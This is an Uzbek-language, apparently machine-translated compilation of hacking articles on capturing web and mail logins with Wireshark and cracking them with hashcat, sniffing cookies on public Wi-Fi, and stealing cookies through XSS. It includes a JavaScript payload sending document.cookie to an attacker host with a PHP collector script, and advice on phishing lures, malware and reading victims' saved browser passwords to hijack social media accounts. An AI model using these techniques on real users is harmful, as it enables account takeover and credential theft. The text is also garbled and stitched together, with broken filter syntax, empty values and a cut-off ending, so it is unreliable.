Ko'pgina foydalanuvchilar yopiq Internet-resursda ro'yxatdan o'tish yoki avtorizatsiya qilishda login va parolni to'ldirish va ENTER tugmasini bosish orqali ushbu ma'lumotlarni osongina ushlab qolish mumkinligini tushunishmaydi. Ko'pincha ular tarmoq orqali himoyalanmagan shaklda uzatiladi. Shuning uchun, agar siz kirmoqchi bo'lgan sayt HTTP protokolidan foydalansa, bu trafikni yozib olish va uni tahlil qilish juda oson. Wireshark yordamida va keyin maxsus filtrlar va dasturlardan foydalanib, parolni toping va shifrini hal qiling.

Parollarni ushlab turish uchun eng yaxshi joy tarmoqning yadrosi bo'lib, u erda barcha foydalanuvchilarning trafigi tashqi resurslarda ro'yxatdan o'tishda Internetga kirish uchun yopiq resurslarga (masalan, pochta) yoki yo'riqnoma oldida ketadi. Biz oynani o'rnatdik va o'zimizni xaker kabi his qilishga tayyormiz.

Qadam 1. Trafikni olish uchun Wireshark-ni o'rnating va ishga tushiring

Ba'zan, buning uchun biz trafikni olishni rejalashtirgan interfeysni tanlash va "Ishga tushirish" tugmasini bosish kifoya. Bizning holatda, biz simsiz tarmoq orqali suratga olamiz.

Trafikni ushlash boshlandi.

2-qadam. Olingan POST trafikini filtrlash

Biz brauzerni ochamiz va foydalanuvchi nomi va parol yordamida ba'zi manbalarga kirishga harakat qilamiz. Avtorizatsiya jarayoni tugallangandan va sayt ochilgandan so'ng, biz Wireshark-da trafikni yozib olishni to'xtatamiz. Keyin, protokol analizatorini oching va ko'p sonli paketlarni ko'ring. Bu yerda ko‘pchilik IT-mutaxassislari bundan keyin nima qilishni bilmasliklari sababli taslim bo‘lishadi. Ammo biz o'z ichiga olgan maxsus paketlarni bilamiz va ularga qiziqamiz POST ma'lumotlari, ular ekranda shaklni to'ldirishda mahalliy mashinamizda hosil qilinadi va manzilga yuboriladi masofaviy server brauzerda "Kirish" yoki "Avtorizatsiya" tugmasini bosganingizda.

Olingan paketlarni ko'rsatish uchun oynaga maxsus filtr kiritamiz: http.iltimos.usul == "POST"

Va biz minglab paketlar o'rniga biz izlayotgan ma'lumotlarga ega faqat bittasini ko'ramiz.

Qadam 3. Foydalanuvchining login va parolini toping

Tezda sichqonchaning o'ng tugmachasini bosing va menyudan elementni tanlang TCP Steam-ni kuzatib boring

Shundan so'ng, sahifaning mazmunini kodda tiklaydigan yangi oynada matn paydo bo'ladi. Keling, parol va foydalanuvchi nomiga mos keladigan "parol" va "foydalanuvchi" maydonlarini topamiz. Ba'zi hollarda ikkala maydon ham oson o'qilishi mumkin va hatto shifrlanmaydi, lekin agar biz Mail.ru, Facebook, VKontakte va boshqalar kabi juda mashhur manbalarga kirishda trafikni qo'lga kiritishga harakat qilsak, parol shifrlangan bo'ladi:

HTTP/1.1 302 topildi

Server: Apache/2.2.15 (CentOS)

X-Powered-by: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV OUR Otro STP IND DEM"

Set-Cookie: parol = ; tugaydi=Ps, 07-noyabr 2024-yil 23:52:21 GMT; yo'l=/

Manzil: loggedin.php

Tarkib uzunligi: 0

Ulanish: yopish

Kontent turi: matn/html; charset=UTF-8

Shunday qilib, bizning holatlarimizda:

Foydalanuvchi nomi: networkguru

Parol:

Qadam 4. Parolni parolini ochish uchun kodlash turini aniqlang

Masalan, http://www.onlinehashcrack.com/hash-identification.php#res veb-saytiga o'ting va identifikatsiya oynasida parolimizni kiriting. Menga ustuvorlik tartibida kodlash protokollari ro'yxati berildi:

Qadam 5. Foydalanuvchi parolini dekodlash

Yoniq bu bosqichda hashcat yordam dasturidan foydalanishimiz mumkin:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Chiqishda biz shifrlangan parolni oldik: simplepassword

Shunday qilib, Wireshark yordamida biz nafaqat ilovalar va xizmatlarning ishlashidagi muammolarni hal qila olamiz, balki o'zimizni xaker sifatida sinab ko'ramiz, foydalanuvchilar veb-shakllarga kiritadigan parollarni tutib olamiz. Bundan tashqari, ko'rsatish uchun oddiy filtrlar yordamida foydalanuvchi pochta qutilari uchun parollarni topishingiz mumkin:

• POP protokoli va filtri quyidagicha ko'rinadi: pop.request.command == "USER" || pop.request.command == "PASS"
• IMAP protokoli va filtri quyidagicha bo'ladi: imap.request "login" ni o'z ichiga oladi
• Protokol SMTP bo'lib, siz quyidagi filtrni kiritishingiz kerak bo'ladi: smtp.req.command == "AUTH"

va kodlash protokolini dekodlash uchun jiddiyroq yordamchi dasturlar.

6-qadam: Agar trafik shifrlangan bo'lsa va HTTPS dan foydalansa nima bo'ladi?

Bu savolga javob berish uchun bir nechta variant mavjud.

Variant 1. Foydalanuvchi va server o'rtasidagi aloqa uzilganda ulaning va ulanish o'rnatilgan vaqtda trafikni yozib oling (SSL Handshake). Ulanish o'rnatilganda, seans kaliti ushlanishi mumkin.

Variant 2: Firefox yoki Chrome tomonidan yozib olingan seans kaliti jurnali fayli yordamida HTTPS trafigining shifrini ochishingiz mumkin. Buning uchun brauzer ushbu shifrlash kalitlarini jurnal fayliga yozish uchun sozlanishi kerak (FireFox asosidagi misol) va siz ushbu jurnal faylini olishingiz kerak. Asosan, siz seans kaliti faylini o'g'irlashingiz kerak qattiq disk boshqa foydalanuvchi (bu noqonuniy). Xo'sh, keyin trafikni yozib oling va uni shifrlash uchun olingan kalitdan foydalaning.

Aniqlash. Biz parolini o'g'irlamoqchi bo'lgan shaxsning veb-brauzeri haqida gapiramiz. Agar biz o'z HTTPS trafikimizni shifrlashni nazarda tutsak va mashq qilmoqchi bo'lsak, bu strategiya ishlaydi. Agar siz boshqa foydalanuvchilarning HTTPS trafigini ularning kompyuterlariga kirmasdan shifrlamoqchi bo'lsangiz, bu ishlamaydi - bu ham shifrlash, ham maxfiylik.

1 yoki 2-variantga muvofiq kalitlarni olganingizdan so'ng ularni WireShark-da ro'yxatdan o'tkazishingiz kerak:

1. Tahrirlash - Afzalliklar - Protokollar - SSL menyusiga o'ting.
2. "Bir nechta TCP segmentlarini qamrab olgan SSL yozuvlarini qayta yig'ish" bayrog'ini o'rnating.
3. "RSA kalitlari ro'yxati" va "Tahrirlash" ni bosing.
4. Barcha maydonlarga ma'lumotlarni kiriting va kalit bilan faylga yo'lni yozing

“Xakerlik vositalariga ega smartfonmi? Bunday narsa yo'q, - biz sizga yaqinda aytgan bo'lardik. Hujumlarni amalga oshirish uchun odatiy vositalarni faqat ba'zi Maemo-da ishga tushirish mumkin edi. Endi ko'plab tanish vositalar iOS va Android-ga ko'chirildi va ba'zi hack-vositalari mobil muhit uchun maxsus yozilgan. Penetratsion testlarda smartfon noutbukni almashtira oladimi? Biz buni tekshirishga qaror qildik.

ANDROID

Paket menejeri

Tarmoq skanerlari

Yo'l harakati manipulyatsiyasi

Trafik tunnellari

Simsiz tarmoq

Veb-ilovalarni tekshirish

Har xil kommunal xizmatlar

Masofaviy kirish

iOS

Tizim bilan ishlash

Ma'lumotlarni ushlash

Simsiz tarmoq tahlili

Tarmoq skanerlari

Masofaviy boshqarish

Parolni tiklash

Zaifliklardan foydalanish

Cookie nima?

Http serveriga foydalanuvchining kompyuteridagi ba'zi matnli ma'lumotlarni saqlash va undan keyin kirish imkonini beruvchi mexanizm mavjud. Ushbu ma'lumot cookie deb ataladi. Aslida, har bir cookie bir juftlikdir: parametr nomi va uning qiymati. Har bir cookie fayliga u tegishli domen ham tayinlanadi. Xavfsizlik nuqtai nazaridan, barcha brauzerlarda http serveriga faqat o'z domenining cookie-fayllariga kirishga ruxsat beriladi. Bundan tashqari, cookie-fayllar yaroqlilik muddatiga ega bo'lishi mumkin, bu holda ular barcha brauzer oynalarini yopsangiz ham, shu sanagacha kompyuterda saqlanadi.

Barcha ko'p foydalanuvchi tizimlari foydalanuvchini aniqlash uchun cookie-fayllardan foydalanadi. Aniqrog'i, foydalanuvchining xizmatga joriy ulanishi, foydalanuvchi sessiyasi. Agar kimdir cookie-fayllaringizni tanisa, u sizning nomingizdan tizimga kirishi mumkin bo'ladi. Chunki ichida hozirda juda oz sonli Internet resurslari bitta foydalanuvchi seansi davomida IP-manzil o'zgarishlarini tekshiradi.

Brauzer ishlab chiquvchilari cookie-fayllarni tahrirlash uchun o'rnatilgan vositalarni taqdim etmaydi. Ammo siz oddiy bloknot bilan o'tishingiz mumkin.

Windows ro'yxatga olish kitobi muharriri 5.00 versiyasi



@="C:\\IE_ext.htm"

Uni IE_ext.reg nomi ostida saqlang

2-qadam: Yaratilgan fayldan foydalanib, Windows ro'yxatga olish kitobiga o'zgartirishlar qo'shing.

3-qadam: matnli matnli fayl yarating

< script til = "javascript">
external.menuArguments.clipboardData.setData("Matn" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
ogohlantirish (external.menuArguments.document.cookie);

4-qadam: Bizni qiziqtirgan veb-saytga o'tamiz.

5-qadam: Sahifaning bo'sh joyini o'ng tugmasini bosing va menyu bandini tanlang "Cookie-fayllar bilan ishlash". Buferga kirishga ruxsat bering. Ushbu saytdagi cookie-fayllaringiz vaqtinchalik xotiraga o'tadi. Siz ularning bloknotini qo'yishingiz va ko'rishingiz mumkin.

6-qadam: Ba'zi cookie-fayllarni o'zgartirish uchun C:\IE_ext.htm faylini almashtiring test nomi kuki nomi bilan, sinov qiymati- uning ma'nosi haqida, testdomain.ru- sayt domeniga. Agar kerak bo'lsa, shunga o'xshash qatorlarni qo'shing. Boshqarish qulayligi uchun men skriptga o'zgartirishdan oldin va keyin joriy cookie-fayllarning chiqishini qo'shdim: ogohlantirish (external.menuArguments.document.cookie);

7-qadam: 5-bosqichni yana bajaring va keyin sahifani yangilang.

Xulosa: biz ushbu Internet-resursga yangilangan cookie-fayllar bilan kiramiz.

JavaScript yordamida cookie-fayllarni qanday o'g'irlash mumkin?

Agar tajovuzkor jabrlanuvchining kompyuterida o'zboshimchalik bilan JavaScript skriptini bajarish imkoniyatini topsa, u joriy cookie-fayllarni juda oson o'qiy oladi. Misol:

var str= document.cookie;

Ammo u ularni o'z saytiga o'tkaza oladimi, chunki yuqorida aytib o'tganimdek, JavaScript skripti boshqa domenda joylashgan saytga qo'shimcha tasdiqsiz kira olmaydi? Aniqlanishicha, JavaScript skripti istalgan http serverida joylashgan istalgan tasvirni yuklay oladi. Shu bilan birga, yuklab olish so'rovidagi har qanday matn ma'lumotlarini ushbu rasmga o'tkazing. Misol: http://hackersite.ru/xss.jpg?text_info Shunday qilib, agar siz ushbu kodni ishlatsangiz:

var img= yangi rasm();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);

"Rasm" ni yuklab olish uchun bunday so'rovlarni qanday hal qilish kerak?

Buzg'unchi faqat PHP-ni qo'llab-quvvatlaydigan hostingni topishi va u erda quyidagi kodni joylashtirishi kerak:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt", "a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Keyin ushbu skript uchun barcha so'rov parametrlari faylda saqlanadi log.txt. Oldin tasvirlangan JavaScript skriptini almashtirish qoladi http://hackersite.ru/xss.jpg ushbu PHP skriptiga boradigan yo'lga.

Men XSS zaifliklaridan foydalanishning eng oddiy usulini ko'rsatdim. Ammo bu shuni ko'rsatadiki, ko'p foydalanuvchili Internet saytida kamida bitta bunday zaiflik mavjudligi tajovuzkorga o'z resurslaridan sizning nomingizdan foydalanishga imkon berishi mumkin.

Salom, bu qisqa maqola, aksincha qisqa Tasvir Men o'zimni bag'ishlashni xohlayman oddiy yo'l cookie-fayllarni to'xtating wi-fi tarmoqlari. Men bu erda sizga cookie fayllari nima ekanligini va nima uchun kerakligini aytmayman, agar odam "pishirilgan mahsulotlar" ni ushlab qolishdan manfaatdor bo'lsa; simsiz tarmoqda, menimcha, u nima ekanligini va nima uchun kerakligini bilishi kerak. Men faqat bir narsani aytaman: ushbu fayllardan foydalanib, foydalanuvchilardan autentifikatsiya jarayonidan o'tishni talab qiladigan turli saytlardagi boshqa odamlarning hisoblariga kirishingiz mumkin (masalan, mail.ru, vkontakte.ru va boshqalar).

Shunday qilib, keling, boshlaylik. Birinchidan, biz simsiz tarmoqning o'zini, ochiq Internetga kirish shlyuzini topishimiz kerak va bu tarmoq juda ko'p mijozlarga ega bo'lishi maqsadga muvofiqdir. Masalan, yirik savdo markazlari, aeroportlar, turli xil qahvaxonalardagi har qanday tarmoq mos keladi, bunday joylarda odamlar odatda foydalanadilar wi-fi kirish Internetda, pochtani o'qish, turli tanishuv saytlarida hisoblarni tekshirish, LJ va turli forumlarni ko'rish uchun. Bularning barchasi bizga kerak bo'lgan narsadir. Tarmoqning joylashishini tanlashga qaror qilib, mijozlarning maksimal sonining ma'lum soatlarini o'rganib, to'g'ridan-to'g'ri jangovar operatsiyalarga o'tamiz. Buning uchun bizga noutbuk kerak wi-fi adapteri, va ma'lum dasturlar to'plami. Mening vaziyatimda men foydalanardim Acer noutbuk Aspire 3610, D-Link DWL G650 mijoz wi-fi kartasi va BackTrack3 OS o'rnatilgan.

Men sizga ushbu OS dan foydalanishni maslahat beraman, chunki u allaqachon sizga kerak bo'lishi mumkin bo'lgan barcha dasturlarni o'z ichiga oladi va eng muhim afzalligi shundaki, siz Backtrack-ni o'rnatishingiz shart emas. qattiq disk, siz ushbu OSni to'g'ridan-to'g'ri CD yoki flesh-diskdan yuklashingiz mumkin.

Endi kerakli dasturiy ta'minotga o'tamiz. Men tarmoqni topish uchun kismet-dan, cookie-fayllarni tutib olish uchun WifiZoo-dan foydalanardim. Men ikkinchi dastur haqida batafsil to'xtalib o'taman. WifiZoo passiv to'lqinli skaner bo'lib, juda ko'p narsalarni to'playdi foydali ma'lumotlar, masalan: pop3, smtp trafiki, http cookie/authinfo, msn, ftp hisob ma'lumotlari, telnet tarmog'i trafigi, nbt va boshqalar. Ushbu dasturning yagona kamchiliklari - bu kanalga o'tish rejimining yo'qligi, WifiZoo shunchaki simsiz interfeysni tinglaydi va ta'bir joiz bo'lsa, kanaldan kanalga o'tolmaydi. Ammo bu kamchilik ushbu rejimni qo'llab-quvvatlaydigan boshqa dastur - Kismet tomonidan qoplanadi. WifiZoo-ni ishga tushirish uchun sizga kerak bo'ladi:

• piton
• qo'rqinchli
• Qismet

Shunday qilib, dasturni ishga tushiramiz, avval kanalga o'tish rejimini qo'llab-quvvatlash uchun Kismet-ni ishga tushiramiz, keyin to'g'ridan-to'g'ri WifiZoo-ni ishga tushiramiz, sizning oldingizda quyidagi oyna paydo bo'lishi kerak:

Endi faqat o'tirib, biror narsani ushlab turguningizcha kutish qoladi; dastur ushlab turgan hamma narsani /logs/ dasturi bilan katalogda joylashgan jurnallarda topish mumkin. 127.0.0.1:8000 da http ga avtomatik ravishda ulanadigan GUI interfeysini ham ishga tushirishingiz mumkin.

Men ushbu ajoyib dasturning barcha xususiyatlari haqida yozmayman, o'ylaymanki, siz boshqa xususiyatlarni o'zingiz aniqlaysiz va hozirgi paytda biz faqat cookie-fayllarga qiziqamiz. Cookie-fayllar yozilgan havolani bosing va biz nima tutganimizni ko'ring:

Cookie fayllarini o'g'irlash usullari

Ushbu xakerlik usuli, cookie-fayllarni o'g'irlash ajoyib ishlaydi va ko'plab xakerlar tomonidan qo'llaniladi. Agar siz ham sinab ko'rmoqchi bo'lsangiz, lekin nima qilishni bilmasangiz, tavsiyalarimizni o'qing.

Cookie fayllari nima?

Bu foydalanuvchining ma'lum bir saytga tashrifi haqidagi ma'lumot. U alohida joyda saqlanadi matnli hujjat. U erda siz turli xil ma'lumotlarni topishingiz mumkin. Jumladan, loginlar, parollar, manzillar pochta qutilari va telefon raqamlari. Shuning uchun o'g'rilar ushbu hujjatlarni qo'llariga olishga intilishadi. Kerakli materiallarni o'g'irlash uchun xakerlar turli usullarga murojaat qilishadi.

Cookie fayllarini o'g'irlash usullari

XSS zaifligi

Uni har qanday veb-saytda topish va ishlatish mumkin. Mutaxassis zaiflikni topgach, unga maxsus kod kiritadi. Maqsadga qarab, kodlar har xil, ular ma'lum bir manba uchun yozilgan. Agar foydalanuvchi ushbu sahifaga tashrif buyursa va uni yangilasa, barcha o'zgarishlar qo'llaniladi. Kod ishlay boshlaydi - u jabrlanuvchining kompyuteriga o'rnatilgan va barchasini to'playdi zarur ma'lumotlar brauzerdan.

Kodni kiritish uchun siz har qanday turdagi zaiflikdan foydalanishingiz mumkin - veb-resursdagi, brauzerdagi yoki kompyuter tizimidagi xato.

XSS hujumlarining 2 turi mavjud:

Passiv - sahifa skriptiga yo'naltirilgan. Bunday holda siz sahifa elementlarida zaifliklarni izlashingiz kerak. Masalan, dialog oynasi, qidiruv oynasi, video katalogi va boshqalar.

Faol - Siz ularni serverda qidirishingiz kerak. Ular, ayniqsa, turli forumlarda, bloglarda va chatlarda tez-tez uchraydi.

Qanday qilib odamni XSS qo'llashga majburlash mumkin?

Vazifa oson emas, chunki ko'pincha kodni faollashtirish uchun siz u bilan havolani bosishingiz kerak. Siz havolani yashirishingiz va uni qiziqarli taklif bilan birga elektron pochta orqali yuborishingiz mumkin. Misol uchun, onlayn-do'konda katta chegirma taklif qiling. Bularning barchasini rasmda ham amalga oshirishingiz mumkin. Foydalanuvchi katta ehtimol bilan uni ko'radi va hech narsadan shubhalanmaydi.

Snifferni o'rnatish

Bu amalga oshirish maxsus dasturlar boshqa birovning qurilmasidagi trafikni kuzatish. Sniffer sizga boshqa odamlarning ma'lumotlari bilan uzatilgan seanslarni ushlab turish imkonini beradi. Shu tarzda siz barcha login va parollarni, manzillarni, istalgan narsalarni olishingiz mumkin muhim ma'lumotlar foydalanuvchi tomonidan tarmoq orqali uzatiladi. Bunday holda, hujumlar ko'pincha himoyalanmagan HTTP ma'lumotlariga amalga oshiriladi. Buning uchun xavfsiz bo'lmagan Wi-Fi yaxshi ishlaydi.

Snifferni amalga oshirishning bir necha yo'li mavjud:

• Trafikni nusxalash;
• Trafik hujumlari yordamida ma'lumotlarni tahlil qilish;
• Interfeyslarni tinglash;
• Kanal uzilishiga snifferni kiritish.

Virus yordamida cookie-fayllarni o'g'irlash

Mutaxassislar, agar bunga alohida ehtiyoj bo'lmasa, cookie-fayllardan foydalanmaslikni maslahat berishadi. Agar ularni o'chirish mumkin bo'lsa, buni qilish yaxshiroqdir. Buning sababi, cookie fayllari juda himoyasiz. Ular ko'pincha jinoyatchilar tomonidan o'g'irlanadi. Ushbu fayllardan katta miqdordagi shaxsiy ma'lumotlarni olish mumkin. maxfiy ma'lumotlar, bu shaxsga qarshi ishlatiladi. Seans tugagandan so'ng tizimda qoladigan fayllarning eng xavfli turi.

Cookie-fayllar ko'pincha virus yordam dasturi yordamida o'g'irlanadi. Bu juda oddiy tarzda amalga oshiriladi. Har qanday xavfsiz yordamchi dastur kompyuterda ma'lum materiallarni to'playdigan virus bilan o'rnatilgan. Virus dasturi o'z egasining serveriga ulanadi. Dastur brauzer uni proksi-server sifatida ishlatishi uchun sozlanishi kerak.

Dastur jabrlanuvchining shaxsiy kompyuteriga etib kelganida, u avtomatik ravishda barcha saqlangan ma'lumotlarni yig'ishni va sizga yuborishni boshlaydi.

Viruslar har xil, ularning vazifalari ham farq qilishi mumkin. Ba'zilar brauzerni to'liq nazorat qilish va har qanday ma'lumotni ko'rish imkonini beradi. Boshqalar himoyalangan materiallarni o'g'irlashga qodir. Boshqalar esa faqat himoyalanmagan ma'lumotlarni yig'adilar.

Siz boshqa birovning kompyuteriga virus dasturini kiritishda qiynalishingiz mumkin. Uni yuklab olish va ishga tushirish uchun foydalanuvchini majburlash kerak. Bu erda siz unga dasturga havola bilan xat yuborishingiz yoki dasturni xavfsiz deb o'chirib tashlashingiz va odam uni veb-saytingizdan yuklab olishini kutishingiz mumkin.

Cookie-fayllarni o'g'irlikdan qanday himoya qilish kerak?

Aksariyat veb-resurslar yetarli darajada himoyalanmagan. Xakerlar ushbu platformalardagi zaifliklar va xatolarni osongina topadilar.

Cookie-fayllarni himoya qilish qoidalari:

1. Kompyuter identifikatorini joriy seansga ulang. Keyin, uchinchi tomon qurilmasidan saytga kirganingizda, yangi seans boshlanadi va avvalgisidan ma'lumotlar olinmaydi.
2. Seansni brauzer bilan bog'lang. Xuddi shu printsip avvalgi xatboshida bo'lgani kabi ishlaydi.
3. Tarmoq orqali yuborilgan parametrlarni shifrlash. Keyin hujjatda saqlangan ma'lumotlar tushunarli bo'lmaydi. Uni ushlab olgan kishi uchun bu foydasiz bo'ladi. Ushbu usul sizni 100% himoya qilmaydi, ba'zi mutaxassislar har qanday materialning shifrini ochishi mumkin.
4. Identifikatorlar uchun alohida papka yarating.

Cookie-fayllar orqali boshqa birovning hisob parolini qanday topish mumkin?

Birovning kirish ma'lumotlarini olish uchun avval u saqlangan faylga kirishingiz kerak.

Foydalanadiganlar uchun Mozilla Firefox asosiy menyuda joylashgan asboblar yorlig'iga o'tishingiz kerak. Keyingi tizim sozlamalarida siz "Himoya" bo'limini topasiz, u erda siz ijtimoiy tarmoqlardagi hisoblar haqidagi barcha muhim ma'lumotlarni qidirishingiz kerak. Barcha parollar yashirin, shuning uchun "ko'rsatish" tugmasini bosing. Siz darhol himoyani o'rnatishingiz va maxsus kodni qo'yishingiz mumkin. Shunda sizdan boshqa hech kim bu ma'lumotni olmaydi.

Operada faqat foydalanuvchi nomlari ommaga ko'rish uchun mavjud. Lekin menyuda siz parol menejerini topishingiz va kompyuteringizda saqlangan hamma narsani ko'rishingiz mumkin. To'liq ro'yxat boshqaruvchida. Parollarga kirish uchun siz qo'shimcha kengaytmani o'rnatishingiz kerak.

IN Gugl xrom Ushbu materiallarning barchasini kengaytirilgan sozlamalarda ko'rish mumkin. Barcha saqlangan cookie-fayllar bilan yorliq mavjud.

Afsuski, standart brauzer Internet Explorer bunday funktsiyalarga ega emas. Shaxsiy kompyuter egasi tashrif buyuradigan veb-platformalar haqida ma'lumot olish uchun siz maxsus dasturni yuklab olishingiz kerak. Siz uni Internetda bepul topishingiz mumkin, u butunlay xavfsiz, lekin uni ishonchli manbalardan yuklab olish yaxshiroqdir. Shuni unutmangki, har qanday dastur antivirus tomonidan skanerdan o'tkazilishi kerak. Bu, ayniqsa, parollar bilan ishlaydigan yordamchi dasturlar uchun to'g'ri keladi.

Ushbu texnika faqat ega bo'lganlar uchun javob beradi jismoniy kirish jabrlanuvchining kompyuteriga. Agar shaxs sizning shaxsiy kompyuteringiz orqali platformaga kirgan va o'z ma'lumotlarini saqlagan bo'lsa, siz boshqa birovning parolini ham bilib olishingiz mumkin.

Cookie fayllarni o'g'irlash uchun dasturlar

Internetda xakerlar bir-biri bilan muloqot qiladigan ko'plab xaker forumlari mavjud. Odamlar u yerga bepul yordam olish umidida borishadi. U erda siz xakerlik uchun juda ko'p turli xil dasturlarni topishingiz mumkin. Sizni ogohlantirmoqchimizki, bu dasturlarga ishonmaslik kerak. Boshqa birovning qurilmasidan cookie-fayllarni masofadan o'g'irlash uchun yordamchi dasturlar dummies yoki virus dasturlari. Agar siz ushbu dasturni shaxsiy kompyuteringizga yuklab qo'ysangiz, firibgarning tuzog'iga tushib qolasiz. Scammers dasturlarni bepul joylashtiradi. Shunday qilib, ular virusli dasturlarni tarqatadilar va boshqa odamlarning shaxsiy kompyuterlari ustidan nazoratni qo'lga kiritadilar. Umuman olganda, bunday dasturlar firibgarlikdir, siz buni interfeysi va mazmuni bilan tushunasiz. Agar siz fayllarni chiqarib olish uchun biron bir dasturdan foydalanmoqchi bo'lsangiz, u holda sniffers bo'lsin. Albatta, ulardan foydalanish unchalik oson emas. Internetda yaxshi snifferni topish oson emas. Ammo bunday dasturiy ta'minotni sizga pul uchun sotishi mumkin bo'lgan mutaxassislardan olish mumkin. Esingizda bo'lsin, ko'plab firibgarlar bor, ularning har biri o'z hiylalariga ega. Siz faqat yaxshi obro'ga ega, sharhlarga ega va o'z veb-saytiga ega ishonchli xakerlarga ishonishingiz kerak.

Xulosa qilib shuni ta'kidlashni istardimki, kukilarni o'g'irlash haqiqatan ham kuchli usul bo'lib, uning samaradorligi juda yuqori. Agar siz ijtimoiy tarmoq yoki messenjerda kimningdir profilini buzib kirmoqchi bo'lsangiz, ushbu variantni ko'rib chiqing. Bu usul jabrlanuvchining kompyuteridan foydalana olsangiz yaxshi ishlaydi. Materiallarni masofadan turib olish ancha qiyin, ammo siz bizning maslahatlarimizdan foydalanishingiz va ushbu usulni amalda qo'llashga harakat qilishingiz mumkin.

Bobda